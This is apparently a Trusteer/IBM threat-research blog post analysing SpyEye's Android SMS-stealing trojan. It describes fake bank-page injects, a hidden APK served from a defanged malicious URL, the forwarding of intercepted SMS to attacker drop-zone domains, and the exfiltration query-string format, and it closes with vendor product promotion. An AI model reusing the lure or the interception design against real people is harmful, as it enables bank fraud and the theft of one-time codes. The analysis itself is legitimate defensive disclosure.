First SpyEye Attack on Android Mobile Platform Now in the Wild

It seems that SpyEye distributors are catching up with the mobile market as they (finally) target the Android mobile platform.

Ever since Man in the Mobile attacks (MitMo/ZitMo) first emerged in late 2010, SpyEye followed Zeus’ tracks by introducing its own hybrid desktop-mobile attacks (dubbed SPITMO).

Trojan:SymbOS/Spitmo

The most recent achievement (that is, until our discovery at the end of July) of SpyEye in the mobile arena was reported in April on F-Secure’s blog.

The Trojan injects fields into a bank’s Web page and asks customers to input their mobile phone number and the IMEI of the phone. The bank customers are then told the information is needed so a “certificate” can be sent to the phone and are informed that it can take up to three days before the certificate is ready.

“The Trojan is signed with a developer certificate. Developer certificates are tied to certain IMEIs and can only be installed to phones that have an IMEI that is listed in the certificate. This is why the malware author(s) request the IMEI in addition to the phone number on the bank’s website. Once they receive new IMEIs, they request an updated certificate with IMEIs for all victims and create a new installer signed with the updated certificate.”

“The delay in getting the new certificate explains why the SpyEye-injected message states it can take up to three days for the certificate to be delivered.”

Up to three days to accomplish an attack in 2011? This is due to the following cumbersome cycle used to circumvent Symbian’s signing requirement:

  • Ask the user for their device’s IMEI;
  • Generate an appropriate certificate;
  • Release an updated installer.

Trojan:DriodOS/Spitmo

Waiting three days just to steal a couple of SMSs is not a reasonable overhead now that we have Android OS, which provides a much more intuitive and modern approach to loot the desired treasure.

Before we dive into the analysis, here’s a pictorial overview of MitMo evolution.

01_mitmo_evolution_blog

The following analysis is based on a compromised machine with SpyEye as found by Trusteer, an IBM company, in the wild on July 24th:

Stage 1: MITB — Web Injects Module (You Know the Drill…)

When a compromised user browses to the targeted bank, a message is injected presenting a “new” security measure, supposedly enforced by the bank, which is now mandatory in order to use its online banking service. The new measure pretends to be an Android application that protects the phone’s SMS messages from being intercepted (there’s irony for you) and will protect the user against fraud.

02_stage-1-MITB-web-injects-module

Clicking on “set the application” displays an additional injected message, providing further instructions for installing the application:

03_stage-1-MITB-web-injects-module-2

Stage 2 : Android (Malicious) Mobile App Installation

The user is directed to the download URL “hxxp://www.androidseguridad.com/simseg.apk.”

After the compromised user installs the Android application on his or her device, the application named “System” is not visible on the device dashboard. It’s not a service, and it’s not listed in any current running applications. In order for a user to determine the existence of this app, a bit of searching is required:

04_stage-2-Android-App-installation

To complete the installation, the user is instructed to dial the number “325000”; the call is intercepted by the Android malware and the “alleged” activation code is presented, to be submitted later into the “bank’s site”:

05_stage-2-Android-App-installation2

The following is a de-compiled code snippet that is responsible for the “activation code” operation. There is no other reference to it in the application package (as of July 24):

06_stage-2-Android-App-installation3_0

Stage 3: Android Secure Application Is a Trojan

Now that the Trojan has installed successfully, all incoming SMSs will be intercepted and transferred to the attacker C&C; the de-compiled code snippet below is run when an SMS is received, creating a string for later use:

“?sender=[SendeerAddress]&receiver=[ReciverAddress]&text=[MessageBody]”

07_stage-3-Android-secure-application-is-a-trojan

As implied from the string structure, it will later be appended as a query string to a GET HTTP request to be sent to the attacker’s drop zone.

The application package consists of a “Settings.xml” file (asset directory), which contains a configuration for the Trojan; “Settings.xml” defines:

  • The transfer method i.e. SMS or HTTP
  • The attacker’s drop zone URLs

Here’s a snippet of the extracted “Settings.xml”:

08-stage-3-Android-secure-application-is-a-trojan2

Stage 4: SMS Spy Command & Control

When examining the drop URLs, four of the domain names in use are not registered (yet!): 124ff42.com; 124ffdfsaf.com; and 124sfafsaffa.com.

However, one of them is not new in relation to SpyEye: The domain “124ffsaf.com” has been “hopping” around different IPs, in several locations, around the world.

Here’s a snippet from SpyEye’s tracker history record for domain 124ffsaf.com over a three-day period:

09_Stage-4-SMS-Spy-Command-and-Control1

Peeking around the attacker C&C reveals an unprotected (at the moment!) statistics page:

10_Stage-4-SMS-Spy-Command-and-Control2

It’s worth pointing out that the information presented in the Attacker C&C above was produced when we tested the Trojan in action in our lab. Sender 15555215556 and Recipient 15555215554 refers to two Android emulators we used to simulate the attack (the corresponding HTTP traffic is presented above).

As indicated by the statistics page above, the attack has yet to gain momentum, so consider this a warning. I’m pretty sure this is just the beginning, so I’m tempted to say, “To be continued…”

SPITMO for Android Mobile Platform Loses the Battle Against Trusteer

Organizations must act now and install a desktop browser security solution as part of a multilayered security profile.

For banks that already offer Trusteer Rapport to their customers, the good news is they’re automatically protected and are not vulnerable to this attack — even if the Trojan is downloaded. This is because Rapport prevents SpyEye from installing on the customer’s PC; therefore, the entire chain of attack is terminated before it has a chance to take hold.

For those that haven’t downloaded Rapport, Trusteer Pinpoint will detect and report in real time victims who are infected with this variant of SpyEye as they attempt to connect to the bank’s website. By restricting the services available to these machines, such as the ability to complete transactions, the attack is defeated.

Finally, Trusteer Mobile for Android (either Secure Library or Secure Browser) will detect and block this attack on the Android mobile platform, preventing any malicious activity.


 

This article was originally written by the IBM Trusteer security research team.

Share this Article:
Amit Klein

CTO, Trusteer, an IBM company

As Trusteer’s CTO, Amit Klein is responsible for researching and introducing game changing technologies into Trusteer’s products, with particular focus on Turtseer’s enterprise solutions. Prior to that, Mr. Klein established, managed and grew the company’s security group, which is one of the world’s leading financial malware research groups. Prior to Trusteer, Mr. Klein was Chief Scientist at Cyota Inc. (acquired by RSA Security), a leading provider of layered authentication solutions. In this role, Mr. Klein researched technologies that prevent online fraud, phishing, and pharming and filed several patents in those areas. Prior to this, Mr. Klein worked as Director of Security and Research at Sanctum, Inc. (acquired by Watchfire, now part of IBM Security Systems), where he was responsible for the security content of all Sanctum products. Mr. Klein holds a B.Sc. (cum laude) in Mathematics and Physics from the Hebrew University of Jerusalem (through IDF’s Talpiot programme).Mr. Klein is a world-renowned security researcher, having published more than thirty articles, papers and technical notes on the topic of Internet security. He was named CTO of the Year by InfoWorld Magazine and has presented at many prestigious conferences including RSA US, FSISAC, OWASP, Microsoft BlueHat, InterOp USA, AusCERT and CertConf.